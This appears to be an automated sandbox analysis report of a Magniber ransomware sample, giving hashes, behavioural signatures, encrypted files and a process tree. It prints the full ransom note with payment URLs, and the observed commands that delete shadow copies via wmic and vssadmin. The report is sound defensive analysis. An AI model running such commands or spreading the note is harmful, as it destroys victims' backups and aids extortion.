Overview

overview

10

Static

static

magnibar_0...d6.exe

windows7_x64

10

magnibar_0...d6.exe

windows10_x64

10

Resubmissions

19-08-2021 01:18

210819-wqg2l69dqn 10

22-07-2021 19:23

210722-87xdtsgz36 10

Analysis

  • max time kernel
    239s
  • max time network
    284s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-07-2021 19:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    magnibar_0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe

  • Size

    21KB

  • MD5

    24d60185a9e294a60c03b90fe731a04a

  • SHA1

    c46b6a52efe81e02da8084f197efce7cb482f897

  • SHA256

    0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6

  • SHA512

    4419eaf48a932c9139c891ee36f51c8a7087357b2de56378a2c3399d8635f90460b30e16dc2b11db704a5f2e702fd116f292f723856b0fca008861eef8302674

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://5a94ea1882607ec01yzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv http://5a94ea1882607ec01yzboiuv.wonride.site/yzboiuv http://5a94ea1882607ec01yzboiuv.lognear.xyz/yzboiuv http://5a94ea1882607ec01yzboiuv.bejoin.space/yzboiuv Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://5a94ea1882607ec01yzboiuv.ndkeblzjnpqgpo5o.onion/yzboiuv

http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv

http://5a94ea1882607ec01yzboiuv.wonride.site/yzboiuv

http://5a94ea1882607ec01yzboiuv.lognear.xyz/yzboiuv

http://5a94ea1882607ec01yzboiuv.bejoin.space/yzboiuv

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Users\Admin\AppData\Local\Temp\magnibar_0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_0e9cb980e176c55c4694f8cb8b4fad949926887ec9e8ba209058bf22f2b359d6.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1960
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:288
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1704
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:572
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1936
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv^&1^&36525374^&72^&335^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://5a94ea1882607ec01yzboiuv.lieedge.casa/yzboiuv&1&36525374&72&335&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2020
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2032
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:900
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:2320
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:952
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2332
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1016
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2180
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2308
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1140
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2100
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2296
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2520
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2512
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2556
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2564
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:2664

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MH2UK1FZ.txt
                MD5

                ab78f7d3961f360fa0f89332122e08cc

                SHA1

                94a4ad29d4a25e79257a2c4d2bbdabae639282b1

                SHA256

                e66bf5f4abf1668ea8bf397a9c971d1f4653c3a8c85a93c43b8ed973f5a6e092

                SHA512

                b3b4986ed0f0b28faee89ed2e3db575819e0c3cbcde2621d60850f753f74c712d17f2bb2d2dedb33875d1da6120552d7cb3b7287c98650cb099453894590d82d

                Download Submit

              • C:\Users\Admin\Desktop\ClearRequest.rtf.yzboiuv
                MD5

                b10a629252d2d55f55be9f01e8942e94

                SHA1

                c1366cbe11eb692114914398f993dc4a9829d105

                SHA256

                7e60b8679b13c5112c1a14cda9b8e7b8e5c47a02465180f3fedc3ea17f0a35d1

                SHA512

                6c4f7f77c4874bc8a9e45c0b27b536bf6f7967426e9df5ba1b7ee7ec4b89935011602ce707e80e1c48a6812ea162e4cbb9c2cda331156c726c478690d324d1ae

                Download Submit

              • C:\Users\Admin\Desktop\CloseMount.pdf.yzboiuv
                MD5

                93960ac4711e7392a24508349d4cd477

                SHA1

                065774f23950b86feb4718970a484eed31924703

                SHA256

                1bad173521f3197a85e37a85fd64c1104712fd805da6b97b385b3e65eef07dbc

                SHA512

                cde1c0b92b0abf0dd9df5b7ca03fdbaf127653492ade0cf8e21e9839a7f81eb93786ef485cfad72e035732b3a42bf652011200c68e47568d1e8f14cc9850bef8

                Download Submit

              • C:\Users\Admin\Desktop\CompressReset.vb.yzboiuv
                MD5

                e54bffda6a66e89276fa68a776c06671

                SHA1

                9453415755f790ece7baf4c6746ae173d03fa34e

                SHA256

                c4cbd7e4b8f3b4b8ddbd932ac1ea4b065c2adba0975a597f5d3e8493f99d04f9

                SHA512

                8f12f027837e691bf593550798a373faae9ec891882b7eb9b9f40d8dea3f9d1318d83122487b7174f69793b25975af365fbdd1b59cb476583ba06f8340b3d252

                Download Submit

              • C:\Users\Admin\Desktop\ConnectJoin.xlsm.yzboiuv
                MD5

                3ef71ce6b6e82eec17d350f319ea5990

                SHA1

                aac7a0d6401e425394b8a9b3f15a573571dbc146

                SHA256

                cd8281c9082c8ff229b845748973d27e1b492ef0a87c0bf7e8a25df92ebc795b

                SHA512

                1b053a23e92524ee7670fb12ddebdebdddac7dcf43ca882d171923384abadf507657eb4ef9e08c86ed30a653cbce206896cb12d30b55e20d06faf56b9e7ed534

                Download Submit

              • C:\Users\Admin\Desktop\DismountMerge.rle.yzboiuv
                MD5

                3c163d8528b5444e34525169bb8e1489

                SHA1

                1cfa78ccf2a323759b39b3ca5b162f3299ab12d8

                SHA256

                4cbc5de6f4827cc42f74c03b8d7abfa6aa6055946ba48bc6a32baaada83ba6d9

                SHA512

                8e90b5444d02390f28d52106179f8fec24db8de1f251e8719b2bf06c02d565e1c83c261d2cc1788bffff964beaefa3bd55d7b11d45f5c2359e32d1c8cbd4e6be

                Download Submit

              • C:\Users\Admin\Desktop\EnterOut.odt.yzboiuv
                MD5

                982f4b0cc21875d5dc1ba2cf2b7522f1

                SHA1

                06c0933c86cff355ba3809dccea05504b71dceb5

                SHA256

                69c8f82772be1ad67af4a1e92ddc8c923d79944fefd70a0f8c0995b0cb21ea58

                SHA512

                3a27d784208743409faa863ba107d50d332e862dba0ed1148b634420918c93c41aa4b85a8003dd09c80f422efd13eee4f4a41413195fc923737855af3a203512

                Download Submit

              • C:\Users\Admin\Desktop\NewRestore.raw.yzboiuv
                MD5

                54edd7a93a243a0935fa68b6b80c2a3c

                SHA1

                e823a32088ca61a6642113b6f0be5fc2cf8739b0

                SHA256

                b8b53ec21c805877a5882f25d5fec3b9fda58473fc8a4d22ad45b93c99f1f8be

                SHA512

                91bc3184975c6d0ee68aad3d8ca728e3917c6af127b24bdfc66796845444bdc53e2b46d72da3ab56127088dd3da74cf5526b8f7c1e308aaaa1d52e8cd1692c6e

                Download Submit

              • C:\Users\Admin\Desktop\PushInvoke.docm.yzboiuv
                MD5

                6e9aad6a19ba070e6c8f25f948b2f9ca

                SHA1

                5b075bc97d2228c15fdcea5b2acf26ef0e0e178c

                SHA256

                3843e7c7eb9bad0fa5e47c727606dbbda23197dd4fd3b84a982de7df5d1cc786

                SHA512

                4d45f7c4726e61c602c322af1c11e7fb3f34c8a28c0c1ce6450031586c8fab8c98c2c8bb32b357cf209f8dcf7b1eaf9cceffd13a380a79dc711e00d62a56796d

                Download Submit

              • C:\Users\Admin\Desktop\RequestRename.asf.yzboiuv
                MD5

                a6ec9588d34143dd95efcd8ef98a537b

                SHA1

                d980b57126ce82c33ef19458c20c8e2b2b05f6ef

                SHA256

                28a0364443e3c2566b018ec42babfd4e60fedfbf6fe1eb1707de6aa5dfd1475e

                SHA512

                f77dc4c9f151867b8be053b8d9999d33f77bda5c5adc1100f867021892c6de33d50369a98900b9963239ea38d47aa7ff226318a95b9cfd85ae44be0781f66541

                Download Submit

              • C:\Users\Admin\Desktop\SaveBlock.ppt.yzboiuv
                MD5

                3375464bcf3ade4562ab4cd7f7f012d6

                SHA1

                c43e0c72d5d17e61dfdd9c103c664efdbf98c91c

                SHA256

                38b3759bd497968352ac974b8fb2618d114cd796b6325147fdf7d5e0b74bd4c2

                SHA512

                70767a42231d3ef700129421c601c33c83e75c49d31f2b6e5130c9ac070653fd1425edff5d19a89ffd765ce9c893c450bd48334ed052775454ccefda28e984fe

                Download Submit

              • C:\Users\Admin\Desktop\SplitResize.doc.yzboiuv
                MD5

                14f82d43e38e60acf0e5f8afcfb54207

                SHA1

                f2c4cb58bb8f31388a025f1fb5fae5b784cefb45

                SHA256

                5f6bd85824fe83efc845977e94b660a112272c432ba8d1d6e8db1e359fff0d81

                SHA512

                a7a3e6ae7504610f3ba9c4af2c2dc95795f68c89bf7b12be1aa6d54e843ddba99938512bc22af1be875bce4f8b42b9bbe8bbfae4cc29b14b4b00f9057c748e81

                Download Submit

              • C:\Users\Admin\Desktop\SubmitMerge.png.yzboiuv
                MD5

                0eafe333d76fcbe4705e7173b3d57341

                SHA1

                76f3f212cbfb27e65536b33ffb18a4cb220b65c3

                SHA256

                489d75cdebc7f99d763562102a431dcdbad5abafde6a866fdc4cfe1321f36e5e

                SHA512

                493177a893a2fa7822357894124fc492342c78488a60ea407726eee584097615bb1b1633728f1c6f525b6c359fcd1eaddafaa993a525d4a06cee06da7f50e5f5

                Download Submit

              • C:\Users\Admin\Desktop\readme.txt
                MD5

                543392d5c9e2505d187237ab83377b78

                SHA1

                ac5acf84f166641aaadcaa34db68d3ce514e82d6

                SHA256

                24cae8568317afef80adbb87fe210795b107b5fb3eccfaa50aff210a2d732dde

                SHA512

                dded4b83ea87c19e906f65a257a8d991f6d0d6c4d83cf151e5a3ff0a40cb758448831fa0582c4d2cfc51a0625d6bcf3ae3d57eef6c9fc1c3717f43e4dfd7bf62

                Download Submit

              • C:\Users\Public\readme.txt
                MD5

                543392d5c9e2505d187237ab83377b78

                SHA1

                ac5acf84f166641aaadcaa34db68d3ce514e82d6

                SHA256

                24cae8568317afef80adbb87fe210795b107b5fb3eccfaa50aff210a2d732dde

                SHA512

                dded4b83ea87c19e906f65a257a8d991f6d0d6c4d83cf151e5a3ff0a40cb758448831fa0582c4d2cfc51a0625d6bcf3ae3d57eef6c9fc1c3717f43e4dfd7bf62

                Download Submit

              • memory/268-84-0x0000000000000000-mapping.dmp

                Download

              • memory/288-87-0x0000000000000000-mapping.dmp

                Download

              • memory/368-60-0x00000000002E0000-0x00000000002E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/368-59-0x0000000000020000-0x0000000000025000-memory.dmp

                Filesize

                20KB

                Download

              • memory/572-85-0x0000000000000000-mapping.dmp

                Download

              • memory/1148-65-0x0000000000000000-mapping.dmp

                Download

              • memory/1192-61-0x0000000002B40000-0x0000000002B50000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1652-68-0x0000000000000000-mapping.dmp

                Download

              • memory/1704-69-0x0000000000000000-mapping.dmp

                Download

              • memory/1804-86-0x0000000000000000-mapping.dmp

                Download

              • memory/1892-66-0x0000000000000000-mapping.dmp

                Download

              • memory/1936-62-0x0000000000000000-mapping.dmp

                Download

              • memory/1936-63-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1960-88-0x0000000000000000-mapping.dmp

                Download

              • memory/2020-70-0x0000000000000000-mapping.dmp

                Download

              • memory/2032-89-0x0000000000000000-mapping.dmp

                Download

              • memory/2100-90-0x0000000000000000-mapping.dmp

                Download

              • memory/2132-91-0x0000000000000000-mapping.dmp

                Download

              • memory/2164-93-0x0000000000000000-mapping.dmp

                Download

              • memory/2180-94-0x0000000000000000-mapping.dmp

                Download

              • memory/2296-98-0x0000000000000000-mapping.dmp

                Download

              • memory/2308-99-0x0000000000000000-mapping.dmp

                Download

              • memory/2320-100-0x0000000000000000-mapping.dmp

                Download

              • memory/2332-101-0x0000000000000000-mapping.dmp

                Download